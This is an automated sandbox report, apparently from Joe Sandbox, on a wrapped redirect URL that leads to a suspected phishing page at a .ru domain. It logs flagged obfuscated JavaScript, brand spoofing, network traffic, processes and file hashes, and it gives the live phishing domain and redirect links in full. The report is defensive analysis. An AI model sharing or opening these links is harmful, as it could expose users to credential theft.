Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf

Overview

General Information

Sample URL:https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff
Analysis ID:1565431

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
AI detected suspicious URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=1912,i,9928609488121353297,1650564168309904053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpU" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk script with multiple red flags: uses atob() for obfuscation, contains an encoded suspicious URL, attempts to prevent debugging (blocks dev tools shortcuts), disables context menu, includes anti-automation checks, and uses document.write() for DOM manipulation. The code appears to be part of a malicious payload delivery system.
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://cloudaccess1092.quivoline.ru
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://cloudaccess1092.quivoline.ru
Source: https://cloudaccess1092.quivoline.ru/g7vY0/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 2.18.82.9:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.82.9:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 24MB later: 31MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: unknownTCP traffic detected without corresponding DNS query: 2.18.82.9
Source: global trafficDNS traffic detected: DNS query: protect.checkpoint.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: clickeu.actmkt.com
Source: global trafficDNS traffic detected: DNS query: cloudaccess1092.quivoline.ru
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 2.18.82.9:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.82.9:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: classification engineClassification label: mal48.win@18/2@10/134
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=1912,i,9928609488121353297,1650564168309904053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpU"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=1912,i,9928609488121353297,1650564168309904053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpU0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    swiftpagenextgen-1864118194.eu-west-2.elb.amazonaws.com
    3.9.148.36
    truefalse
      unknown
      www.google.com
      142.250.181.68
      truefalse
        high
        d2srg6h49ykvtq.cloudfront.net
        18.66.161.112
        truefalse
          unknown
          cloudaccess1092.quivoline.ru
          162.159.140.160
          truetrue
            unknown
            clickeu.actmkt.com
            unknown
            unknownfalse
              unknown
              protect.checkpoint.com
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://cloudaccess1092.quivoline.ru/g7vY0/false
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  18.66.161.112
                  d2srg6h49ykvtq.cloudfront.netUnited States
                  3MIT-GATEWAYSUSfalse
                  172.217.19.227
                  unknownUnited States
                  15169GOOGLEUSfalse
                  172.217.19.238
                  unknownUnited States
                  15169GOOGLEUSfalse
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  172.217.17.67
                  unknownUnited States
                  15169GOOGLEUSfalse
                  172.217.17.78
                  unknownUnited States
                  15169GOOGLEUSfalse
                  3.9.148.36
                  swiftpagenextgen-1864118194.eu-west-2.elb.amazonaws.comUnited States
                  16509AMAZON-02USfalse
                  162.159.140.160
                  cloudaccess1092.quivoline.ruUnited States
                  13335CLOUDFLARENETUStrue
                  74.125.205.84
                  unknownUnited States
                  15169GOOGLEUSfalse
                  239.255.255.250
                  unknownReserved
                  unknownunknownfalse
                  142.250.181.68
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  35.190.80.1
                  a.nel.cloudflare.comUnited States
                  15169GOOGLEUSfalse
                  IP
                  192.168.2.16
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1565431
                  Start date and time:2024-11-29 20:36:16 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpU
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal48.win@18/2@10/134
                  • Exclude process from analysis (whitelisted): svchost.exe
                  • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.238, 74.125.205.84
                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpU
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2689
                  Entropy (8bit):4.015202413751582
                  Encrypted:false
                  SSDEEP:
                  MD5:839702C48F6F0098143D3B20078B6E98
                  SHA1:AC65DD1B15FDAD2EC2FEA943822BBDAE0C1DEC84
                  SHA-256:F507941A690200698589797080BB01FE045F3E9C446E4BBE0572FBCAADDAE100
                  SHA-512:E6F4838AF1CC45F3F32DEF86A5295AD86C6F8C4967B29BA99A196CC5E7391F8D19DA56C1F3DB898A22F6BC576FF71AE5F222119176203EEB8B592D02FD0AFBB0
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I}Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............O'H.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (7345), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):19745
                  Entropy (8bit):5.893493853515428
                  Encrypted:false
                  SSDEEP:
                  MD5:062F4FE4A7A0BC646CA747AA5F65B5DA
                  SHA1:CD789EB6B0D0D15780AD93A036AC62AAC6E4664E
                  SHA-256:C1F44F2C5E697968BF1FBA41C43327A733B573D383A41526B65027893B13AF23
                  SHA-512:5FA75C7FB685CE347E94A5F2BC69022DF78A3692FD9488D0D480346A0EAABB7459751B9E8F6D9F65F9AED178BC646FE4FDDAEAA67599E88AA435D0B8FFB4012C
                  Malicious:false
                  Reputation:unknown
                  URL:https://cloudaccess1092.quivoline.ru/g7vY0/
